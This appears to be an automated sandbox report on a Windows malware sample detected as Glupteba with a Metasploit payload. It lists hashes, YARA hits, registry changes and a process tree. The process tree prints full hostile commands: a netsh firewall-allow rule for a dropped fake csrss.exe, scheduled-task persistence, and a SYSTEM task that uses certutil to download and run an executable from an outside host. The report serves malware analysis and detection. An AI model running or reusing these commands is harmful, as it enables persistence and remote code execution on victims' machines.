Analysis
-
max time kernel
130s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
24-07-2022 06:17
Static task
static1
Behavioral task
behavioral1
Sample
58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe
Resource
win10v2004-20220721-en
General
-
Target
58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe
-
Size
3.9MB
-
MD5
baed2d4a67d695e801fd7ef857edab8f
-
SHA1
be41f49ff9ebb3ac4ec357e3862fb13ce61b75f7
-
SHA256
58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7
-
SHA512
3aff595eb126cabed9e9503bc1ed32721404ed26b4063956dfc1f0fbda0d4844b3ab96c46bbc7a9efe11d75082a04d8a761e4b3d36182225cf9d522a26460fec
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba payload 8 IoCs
Processes:
resource yara_rule behavioral2/memory/4660-131-0x0000000003CD0000-0x00000000044D2000-memory.dmp family_glupteba behavioral2/memory/4660-132-0x0000000000400000-0x0000000003357000-memory.dmp family_glupteba behavioral2/memory/4660-134-0x0000000003CD0000-0x00000000044D2000-memory.dmp family_glupteba behavioral2/memory/744-137-0x0000000000400000-0x0000000003357000-memory.dmp family_glupteba behavioral2/memory/4660-138-0x0000000000400000-0x0000000003357000-memory.dmp family_glupteba behavioral2/memory/744-144-0x0000000000400000-0x0000000003357000-memory.dmp family_glupteba behavioral2/memory/3196-146-0x0000000000400000-0x0000000003357000-memory.dmp family_glupteba behavioral2/memory/3196-152-0x0000000000400000-0x0000000003357000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
svchost.exedescription pid process target process PID 4980 created 4660 4980 svchost.exe 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe PID 4980 created 3196 4980 svchost.exe csrss.exe PID 4980 created 3196 4980 svchost.exe csrss.exe PID 4980 created 3196 4980 svchost.exe csrss.exe -
Executes dropped EXE 2 IoCs
Processes:
csrss.exepatch.exepid process 3196 csrss.exe 2224 patch.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GreenLeaf = "\"C:\\Windows\\rss\\csrss.exe\"" 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 2412 bcdedit.exe -
Drops file in Windows directory 2 IoCs
Processes:
58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exedescription ioc process File opened for modification C:\Windows\rss 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe File created C:\Windows\rss\csrss.exe 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2052 schtasks.exe 4956 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" csrss.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.execsrss.exepid process 4660 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe 4660 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe 744 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe 744 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe 3196 csrss.exe 3196 csrss.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exesvchost.execsrss.exedescription pid process Token: SeDebugPrivilege 4660 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe Token: SeImpersonatePrivilege 4660 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe Token: SeTcbPrivilege 4980 svchost.exe Token: SeTcbPrivilege 4980 svchost.exe Token: SeBackupPrivilege 4980 svchost.exe Token: SeRestorePrivilege 4980 svchost.exe Token: SeBackupPrivilege 4980 svchost.exe Token: SeRestorePrivilege 4980 svchost.exe Token: SeSystemEnvironmentPrivilege 3196 csrss.exe Token: SeBackupPrivilege 4980 svchost.exe Token: SeRestorePrivilege 4980 svchost.exe Token: SeBackupPrivilege 4980 svchost.exe Token: SeRestorePrivilege 4980 svchost.exe Token: SeBackupPrivilege 4980 svchost.exe Token: SeRestorePrivilege 4980 svchost.exe Token: SeBackupPrivilege 4980 svchost.exe Token: SeRestorePrivilege 4980 svchost.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
svchost.exe58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.execmd.execsrss.exedescription pid process target process PID 4980 wrote to memory of 744 4980 svchost.exe 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe PID 4980 wrote to memory of 744 4980 svchost.exe 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe PID 4980 wrote to memory of 744 4980 svchost.exe 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe PID 744 wrote to memory of 4712 744 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe cmd.exe PID 744 wrote to memory of 4712 744 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe cmd.exe PID 4712 wrote to memory of 212 4712 cmd.exe netsh.exe PID 4712 wrote to memory of 212 4712 cmd.exe netsh.exe PID 744 wrote to memory of 3196 744 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe csrss.exe PID 744 wrote to memory of 3196 744 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe csrss.exe PID 744 wrote to memory of 3196 744 58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe csrss.exe PID 4980 wrote to memory of 2052 4980 svchost.exe schtasks.exe PID 4980 wrote to memory of 2052 4980 svchost.exe schtasks.exe PID 4980 wrote to memory of 4956 4980 svchost.exe schtasks.exe PID 4980 wrote to memory of 4956 4980 svchost.exe schtasks.exe PID 4980 wrote to memory of 2224 4980 svchost.exe patch.exe PID 4980 wrote to memory of 2224 4980 svchost.exe patch.exe PID 3196 wrote to memory of 2412 3196 csrss.exe bcdedit.exe PID 3196 wrote to memory of 2412 3196 csrss.exe bcdedit.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe"C:\Users\Admin\AppData\Local\Temp\58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4660 -
C:\Users\Admin\AppData\Local\Temp\58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe"C:\Users\Admin\AppData\Local\Temp\58dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:212 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:2052 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
PID:4956 -
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
PID:2224 -
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
PID:2412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4980
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
Filesize
3.9MB
MD5baed2d4a67d695e801fd7ef857edab8f
SHA1be41f49ff9ebb3ac4ec357e3862fb13ce61b75f7
SHA25658dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7
SHA5123aff595eb126cabed9e9503bc1ed32721404ed26b4063956dfc1f0fbda0d4844b3ab96c46bbc7a9efe11d75082a04d8a761e4b3d36182225cf9d522a26460fec
-
Filesize
3.9MB
MD5baed2d4a67d695e801fd7ef857edab8f
SHA1be41f49ff9ebb3ac4ec357e3862fb13ce61b75f7
SHA25658dd4bded52daaaed823fd8d689dd3ff6d889e0bf23841c204ace1e54cc824a7
SHA5123aff595eb126cabed9e9503bc1ed32721404ed26b4063956dfc1f0fbda0d4844b3ab96c46bbc7a9efe11d75082a04d8a761e4b3d36182225cf9d522a26460fec